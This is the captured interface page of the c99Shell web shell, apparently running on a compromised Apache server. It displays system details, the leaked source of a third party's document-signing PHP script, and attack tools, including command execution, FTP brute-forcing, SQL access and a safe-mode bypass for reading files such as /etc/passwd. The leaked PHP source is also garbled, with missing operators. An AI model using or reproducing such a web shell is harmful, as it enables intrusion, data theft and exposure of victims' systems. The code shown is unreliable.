!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6 

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686 

uid=48(apache) gid=48(apache) groups=48(apache) 

Safe-mode: OFF (not secure)

/var/www/html/manage/directorBCNU/admin/   drwxr-xr-x
Free 52.6 GB of 127.8 GB (41.16%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     processSignDoc.php (5.6 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php
include_once("../../class/clsConnection.php");
include_once("../../class/clsDB.php");
include_once "../global.php";
include_once "../link/function.php";
include_once "../link/functionshow.php";
include_once "../class/clsDocType.php";
include_once "../class/clsDocattatchesTmp.php";
include_once "../class/clsDocuments.php";
include_once "../class/clsRunningDoc.php";
include_once "../class/clsDocattatches.php";
include_once "../class/clsDocReceiveSend.php";
include_once "../class/clsDocWSign.php";
include_once "../class/clsDocForSign.php";
include_once "../class/clsDocLineConfig.php";

$oC = new clsConnection($GLOBALS['DBHOST'], $GLOBALS['DBNAME_EOFFICE'], $GLOBALS['DBUSER_EOFFICE'], $GLOBALS['DBPASS_EOFFICE']);

$oDt = new doctype($oC);
$oDt1 = new doctype($oC);
$oDtmp = new DocattatchesTmp($oC);
$oDatt = new Docattatches($oC);
$oDoc = new Documents($oC);
$oRd = new runningdoc($oC);
$oRd1 = new runningdoc($oC);
$oRs = new DocReceiveSend($oC);
$oRs1 = new DocReceiveSend($oC);
$oRs2 = new DocReceiveSend($oC);
$oRs3 = new DocReceiveSend($oC);
$oDws = new docwsign($oC);
$oDfs = new DocForSign($oC);
$oDlc = new DocLineConfig($oC);

if($method=="addsign"){ 
    $flagCommit true;
    $oC->BeginTrans();
    
    $oDoc->SearchByKey($DocID);
    if($oDoc->GetRecord()=="1"){
            $oDoc->Edit();
            $oDoc->DsID="3";
            $flagCommit $oDoc->Save();
    }
            $oRs->SearchByKey($DrsID);
            $oRs->GetRecord();
            $oRs->Edit();
            $oRs->DrsSendDate=getNowDateTh()." ".date('H:i:s');
            //echo "DrsSendDate=".$oRs->DrsSendDate;
            if($cansend!="Y"){
                //$oRs->DrsSendPersonId=$DlcPsId;
                $oRs->DrsSendPersonId='';
            }else if($cansend=="Y"){
                $oRs->DrsSendPersonId=$personId;
            }
            //echo "DrsSendPersonId=".$oRs->DrsSendPersonId;
            if($cansend!="Y"){
                $oRs->DrsSendDlcID=$DlcPs;
            }else if($cansend=="Y"){
                $oRs->DrsSendDlcID=$DlcIDlogin;
            }
            //echo "DrsSendDlcID=".$oRs->DrsSendDlcID;
            $oRs->DrsSign=$DrsSign;    
            $flagCommit $oRs->Save();
            
            //---------------add DocReceiveSend
            $oRs1->AddNew();
            $oRs1->DrsID=$oRs1->GetNextCode();
            $oRs1->DocID=$DocID;
            if($cansend!="Y"){
                $oRs1->DlcID=$DlcPs;
            }else if($cansend=="Y"){
                $oRs1->DlcID=$DlcIDlogin;
            }
            $oRs1->DsID=3;
            $oRs1->PtID=$oRs->PtID;
            $oRs1->DrsDocTypeNo=$oRs->DrsDocTypeNo;
            $oRs1->DrsReceiveDate=$oRs->DrsSendDate;
            //$oRs1->DrsReceivePersonId=$DlcPsId;
            $oRs1->DrsReceivePersonId='';
            $oRs1->DrsDocDueDate=$oRs->DrsDocDueDate;
            $oRs1->DrsDlcIDCreate=$DlcIDlogin;
            $oRs1->DrsPsIDCreate=$personId;
            $oRs1->DrsPropose=$oRs->DrsPropose;
            $oRs1->DrsSign=$DrsSign;
            $oRs1->DrsFromDrsID=$oRs->DrsID;
            //echo "DrsFromDrsID=".$oRs1->DrsFromDrsID;
            $oRs1->DocGroup=$oRs->DocGroup;
            if($cansend!="Y"){
                $oRs1->DrsSend=$oRs1->DrsSend;
            }else if($cansend=="Y"){
                $oRs1->DrsSend="Y";
            }    
            $oRs1->AnID=$oRs->AnID;
            $oRs1->DrsstartDatePost=$oRs->DrsstartDatePost;
            $oRs1->DrsendDatePost=$oRs->DrsendDatePost;    
            $flagCommit $oRs1->Save();
    
    if($DocForSign==&& $DocPID!="0"){
        $oDlc->SearchByKey($DlcIDlogin); $oDlc->GetRecord(); 
        $oRs2->SearchDeptSendDocforSign($oDoc->DocID);
        $oRs2->GetRecord();
        $oRs3->SearchByKey($oRs2->DrsFromDrsID);
        $oRs3->GetRecord();
        
        $oDfs->AddNew();
        $oDfs->dfID=$oDfs->GetNextCode();
        $oDfs->DocID=$oRs3->DocID;
        $oDfs->DlcID=$oRs2->DrsDlcIDCreate;
        $oDfs->DocGroup=$oRs3->DocGroup;
        $oDfs->DlcIDsign=$DlcIDlogin;
        $oDfs->DeptSign=$oDlc->deptId;
        $oDfs->Save();
        //echo $oRs8->DrsID.'--'.$oRs8->DrsDlcIDCreate.'--'.$oRs8->DrsPsIDCreate.'-'.$oRs8->DrsFromDrsID;        
    }
            
            if($flagCommit)
                $oC->CommitTrans();
            else
                $oC->RollbackTrans();
    if($DocForSign==&& $DocPID!="0"){
        echo "<meta http-equiv='refresh' content='0; URL=signDoc.php'>";
    }else{            
        if($cansend=="Y"){
            if($oDoc->RsID!='2'){ $fn="showSendDoc.php"; }else{  $fn="showSendDocSR.php"; }
            echo "<meta http-equiv='refresh' content='0; URL=$fn?DocID=$DocID&DrsID=$oRs1->DrsID&cansend=$cansend'>";
        }else{                    
            echo "<meta http-equiv='refresh' content='0; URL=signDoc.php'>";
        }
    }
}else if($method=="addsignDocforSign"){ 
    $flagCommit true;
    $oC->BeginTrans();
    
    $oDoc->SearchByKey($DocID);
    if($oDoc->GetRecord()=="1"){
            $oDoc->Edit();
            $oDoc->DsID="3";
            $flagCommit $oDoc->Save();
    }
            $oRs->SearchByKey($DrsID);
            $oRs->GetRecord();
            $oRs->Edit();
            $oRs->DrsSendDate=getNowDateTh()." ".date('H:i:s');
            if($cansend!="Y"){
                $oRs->DrsSendPersonId='';
            }else if($cansend=="Y"){
                $oRs->DrsSendPersonId=$personId;
            }
            if($cansend!="Y"){
                $oRs->DrsSendDlcID=$DlcPs;
            }else if($cansend=="Y"){
                $oRs->DrsSendDlcID=$DlcIDlogin;
            }
            $oRs->DrsSign=$DrsSign;    
            $flagCommit $oRs->Save();
            
            if($flagCommit)
                $oC->CommitTrans();
            else
                $oC->RollbackTrans();
                                    
        echo "<meta http-equiv='refresh' content='0; URL=signDoc.php'>";
}else if($method=="addWsign"){ 
    $flagCommit true;
    $oC->BeginTrans();
    
            $oRs->SearchByKey($DrsID);
            $oRs->GetRecord();
            $oRs->Edit();
            $oRs->DrsWSign='Y'
            $flagCommit $oRs->Save();

            $oDws->AddNew();
            $oDws->wID=$oDws->GetNextCode();
            $oDws->DocID=$oRs->DocID;
            $oDws->DrsID=$DrsID;
            $oDws->signDateTime=getNowDateTh()." ".date('H:i:s');
            $oDws->DlcID=$oRs->DlcID;
            $oDws->personId=$oRs->DrsReceivePersonId ;
            $oDws->DocSign=$DrsSign;
            $oDws->DocGroup=$oRs->DocGroup;
            $flagCommit $oDws->Save();
            
    
            if($flagCommit)
                $oC->CommitTrans();
            else
                $oC->RollbackTrans();
    echo "<meta http-equiv='refresh' content='0; URL=signDoc.php'>";    
}
?>

:: Command execute ::

Enter:
 
Select:
 

:: Shadow's tricks :D ::

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

:: Preddy's tricks :D ::

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd
Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

:: Search ::
  - regexp 
:: Upload ::
 
[ Read-Only ]

:: Make Dir ::
 
[ Read-Only ]
:: Make File ::
 
[ Read-Only ]

:: Go Dir ::
 
:: Go File ::
 

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0058 ]--